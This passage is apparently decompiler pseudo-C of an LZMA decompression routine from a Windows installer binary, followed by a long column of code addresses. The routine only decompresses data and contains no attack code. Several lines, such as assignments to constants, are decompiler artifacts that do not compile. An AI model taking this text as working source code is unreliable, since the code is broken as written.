											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                          0x00000000
                                                          0x00406f8c
                                                          0x00406f8c
                                                          0x00406f90
                                                          0x00406fb5
                                                          0x00406fbf
                                                          0x00000000
                                                          0x00406f92
                                                          0x00406f92
                                                          0x00406f95
                                                          0x00406f99
                                                          0x00406f9c
                                                          0x00406f9f
                                                          0x00406fa3
                                                          0x00406fa3
                                                          0x00406fa6
                                                          0x00407080
                                                          0x00407080
                                                          0x00407087
                                                          0x00407087
                                                          0x0040708a
                                                          0x00407091
                                                          0x004070be
                                                          0x004070c2
                                                          0x00407122
                                                          0x00407125
                                                          0x0040712a
                                                          0x0040712b
                                                          0x0040712d
                                                          0x0040712f
                                                          0x00407132
                                                          0x0040703e
                                                          0x0040703e
                                                          0x0040703e
                                                          0x004067da
                                                          0x004067da
                                                          0x004067da
                                                          0x004067e3
                                                          0x00000000
                                                          0x00000000
                                                          0x004067e9
                                                          0x00000000
                                                          0x004067f4
                                                          0x00000000
                                                          0x00000000
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406807
                                                          0x00000000
                                                          0x00000000
                                                          0x0040680d
                                                          0x00406810
                                                          0x00406812
                                                          0x00406813
                                                          0x00406816
                                                          0x00406818
                                                          0x00406819
                                                          0x0040681b
                                                          0x0040681e
                                                          0x00406823
                                                          0x00406828
                                                          0x00406831
                                                          0x00406844
                                                          0x00406847
                                                          0x00406853
                                                          0x0040687b
                                                          0x0040687d
                                                          0x0040688b
                                                          0x0040688b
                                                          0x0040688f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040687f
                                                          0x0040687f
                                                          0x00406882
                                                          0x00406883
                                                          0x00406883
                                                          0x00000000
                                                          0x0040687f
                                                          0x00406859
                                                          0x0040685e
                                                          0x0040685e
                                                          0x00406867
                                                          0x0040686f
                                                          0x00406872
                                                          0x00000000
                                                          0x00406878
                                                          0x00406878
                                                          0x00000000
                                                          0x00406878
                                                          0x00000000
                                                          0x00406895
                                                          0x00406895
                                                          0x00406899
                                                          0x00407145
                                                          0x00000000
                                                          0x00407145
                                                          0x004068a2
                                                          0x004068b2
                                                          0x004068b5
                                                          0x004068b8
                                                          0x004068b8
                                                          0x004068b8
                                                          0x004068bb
                                                          0x004068bf
                                                          0x00000000
                                                          0x00000000
                                                          0x004068c1
                                                          0x004068c7
                                                          0x004068f1
                                                          0x004068f7
                                                          0x004068fe
                                                          0x00000000
                                                          0x004068fe
                                                          0x004068cd
                                                          0x004068d0
                                                          0x004068d5
                                                          0x004068d5
                                                          0x004068e0
                                                          0x004068e8
                                                          0x004068eb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406930
                                                          0x00406936
                                                          0x00406939
                                                          0x00406946
                                                          0x0040694e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406905
                                                          0x00406905
                                                          0x00406909
                                                          0x00407154
                                                          0x00000000
                                                          0x00407154
                                                          0x00406915
                                                          0x00406920
                                                          0x00406920
                                                          0x00406920
                                                          0x00406923
                                                          0x00406926
                                                          0x00406929
                                                          0x0040692e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406fc5
                                                          0x00406fc5
                                                          0x00406fcb
                                                          0x00406fd1
                                                          0x00406fd7
                                                          0x00406ff1
                                                          0x00406ff4
                                                          0x00406ffa
                                                          0x00407005
                                                          0x00407005
                                                          0x00407007
                                                          0x00406fd9
                                                          0x00406fd9
                                                          0x00406fe8
                                                          0x00406fec
                                                          0x00406fec
                                                          0x00407011
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407013
                                                          0x00407017
                                                          0x004071c6
                                                          0x00000000
                                                          0x004071c6
                                                          0x00407023
                                                          0x0040702a
                                                          0x00407032
                                                          0x00407035
                                                          0x00407038
                                                          0x00407038
                                                          0x00000000
                                                          0x00000000
                                                          0x00406956
                                                          0x00406958
                                                          0x0040695b
                                                          0x004069cc
                                                          0x004069cf
                                                          0x004069d2
                                                          0x004069d9
                                                          0x004069e3
                                                          0x00000000
                                                          0x004069e3
                                                          0x0040695d
                                                          0x00406961
                                                          0x00406964
                                                          0x00406966
                                                          0x00406969
                                                          0x0040696c
                                                          0x0040696e
                                                          0x00406971
                                                          0x00406973
                                                          0x00406978
                                                          0x0040697b
                                                          0x0040697e
                                                          0x00406982
                                                          0x00406989
                                                          0x0040698c
                                                          0x00406993
                                                          0x00406997
                                                          0x0040699f
                                                          0x0040699f
                                                          0x0040699f
                                                          0x00406999
                                                          0x00406999
                                                          0x00406999
                                                          0x0040698e
                                                          0x0040698e
                                                          0x0040698e
                                                          0x004069a3
                                                          0x004069a6
                                                          0x004069c4
                                                          0x004069c6
                                                          0x00000000
                                                          0x004069a8
                                                          0x004069a8
                                                          0x004069ab
                                                          0x004069ae
                                                          0x004069b1
                                                          0x004069b3
                                                          0x004069b3
                                                          0x004069b3
                                                          0x004069b6
                                                          0x004069b9
                                                          0x004069bb
                                                          0x004069bc
                                                          0x004069bf
                                                          0x00000000
                                                          0x004069bf
                                                          0x00000000
                                                          0x00406bf5
                                                          0x00406bf9
                                                          0x00406c17
                                                          0x00406c1a
                                                          0x00406c21
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2a
                                                          0x00406c2d
                                                          0x00406c30
                                                          0x00406c32
                                                          0x00406c39
                                                          0x00406c3a
                                                          0x00406c3c
                                                          0x00406c3f
                                                          0x00406c42
                                                          0x00406c45
                                                          0x00406c45
                                                          0x00406c4a
                                                          0x00000000
                                                          0x00406c4a
                                                          0x00406bfb
                                                          0x00406bfe
                                                          0x00406c01
                                                          0x00406c0b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c5f
                                                          0x00406c63
                                                          0x00406c86
                                                          0x00406c89
                                                          0x00406c8c
                                                          0x00406c96
                                                          0x00406c65
                                                          0x00406c65
                                                          0x00406c68
                                                          0x00406c6b
                                                          0x00406c6e
                                                          0x00406c7b
                                                          0x00406c7e
                                                          0x00406c7e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ca2
                                                          0x00406ca6
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cac
                                                          0x00406cb0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cb6
                                                          0x00406cb8
                                                          0x00406cbc
                                                          0x00406cbc
                                                          0x00406cbf
                                                          0x00406cc3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d13
                                                          0x00406d17
                                                          0x00406d1e
                                                          0x00406d21
                                                          0x00406d24
                                                          0x00406d2e
                                                          0x00000000
                                                          0x00406d2e
                                                          0x00406d19
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d3a
                                                          0x00406d3e
                                                          0x00406d45
                                                          0x00406d48
                                                          0x00406d4b
                                                          0x00406d40
                                                          0x00406d40
                                                          0x00406d40
                                                          0x00406d4e
                                                          0x00406d51
                                                          0x00406d54
                                                          0x00406d54
                                                          0x00406d57
                                                          0x00406d5a
                                                          0x00406d5d
                                                          0x00406d5d
                                                          0x00406d60
                                                          0x00406d67
                                                          0x00406d6c
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dfa
                                                          0x00406dfa
                                                          0x00406dfe
                                                          0x0040719c
                                                          0x00000000
                                                          0x0040719c
                                                          0x00406e04
                                                          0x00406e07
                                                          0x00406e0a
                                                          0x00406e0e
                                                          0x00406e11
                                                          0x00406e17
                                                          0x00406e19
                                                          0x00406e19
                                                          0x00406e19
                                                          0x00406e1c
                                                          0x00406e1f
                                                          0x00000000
                                                          0x00000000
                                                          0x004069ef
                                                          0x004069ef
                                                          0x004069f3
                                                          0x00407160
                                                          0x00000000
                                                          0x00407160
                                                          0x004069f9
                                                          0x004069fc
                                                          0x004069ff
                                                          0x00406a03
                                                          0x00406a06
                                                          0x00406a0c
                                                          0x00406a0e
                                                          0x00406a0e
                                                          0x00406a0e
                                                          0x00406a11
                                                          0x00406a14
                                                          0x00406a14
                                                          0x00406a17
                                                          0x00406a1a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a20
                                                          0x00406a26
                                                          0x00000000
                                                          0x00000000
                                                          0x00406a2c
                                                          0x00406a2c
                                                          0x00406a30
                                                          0x00406a33
                                                          0x00406a36
                                                          0x00406a39
                                                          0x00406a3c
                                                          0x00406a3d
                                                          0x00406a40
                                                          0x00406a42
                                                          0x00406a48
                                                          0x00406a4b
                                                          0x00406a4e
                                                          0x00406a51
                                                          0x00406a54
                                                          0x00406a57
                                                          0x00406a5a
                                                          0x00406a76
                                                          0x00406a79
                                                          0x00406a7c
                                                          0x00406a7f
                                                          0x00406a86
                                                          0x00406a8a
                                                          0x00406a8c
                                                          0x00406a90
                                                          0x00406a5c
                                                          0x00406a5c
                                                          0x00406a60
                                                          0x00406a68
                                                          0x00406a6d
                                                          0x00406a6f
                                                          0x00406a71
                                                          0x00406a71
                                                          0x00406a93
                                                          0x00406a9a
                                                          0x00406a9d
                                                          0x00000000
                                                          0x00406aa3
                                                          0x00000000
                                                          0x00406aa3
                                                          0x00000000
                                                          0x00406aa8
                                                          0x00406aa8
                                                          0x00406aac
                                                          0x0040716c
                                                          0x00000000
                                                          0x0040716c
                                                          0x00406ab2
                                                          0x00406ab5
                                                          0x00406ab8
                                                          0x00406abc
                                                          0x00406abf
                                                          0x00406ac5
                                                          0x00406ac7
                                                          0x00406ac7
                                                          0x00406ac7
                                                          0x00406aca
                                                          0x00406acd
                                                          0x00406acd
                                                          0x00406acd
                                                          0x00406ad3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ad5
                                                          0x00406ad8
                                                          0x00406adb
                                                          0x00406ade
                                                          0x00406ae1
                                                          0x00406ae4
                                                          0x00406ae7
                                                          0x00406aea
                                                          0x00406aed
                                                          0x00406af0
                                                          0x00406af3
                                                          0x00406b0b
                                                          0x00406b0e
                                                          0x00406b11
                                                          0x00406b14
                                                          0x00406b14
                                                          0x00406b17
                                                          0x00406b1b
                                                          0x00406b1d
                                                          0x00406af5
                                                          0x00406af5
                                                          0x00406afd
                                                          0x00406b02
                                                          0x00406b04
                                                          0x00406b06
                                                          0x00406b06
                                                          0x00406b20
                                                          0x00406b27
                                                          0x00406b2a
                                                          0x00000000
                                                          0x00406b2c
                                                          0x00000000
                                                          0x00406b2c
                                                          0x00406b2a
                                                          0x00406b31
                                                          0x00406b31
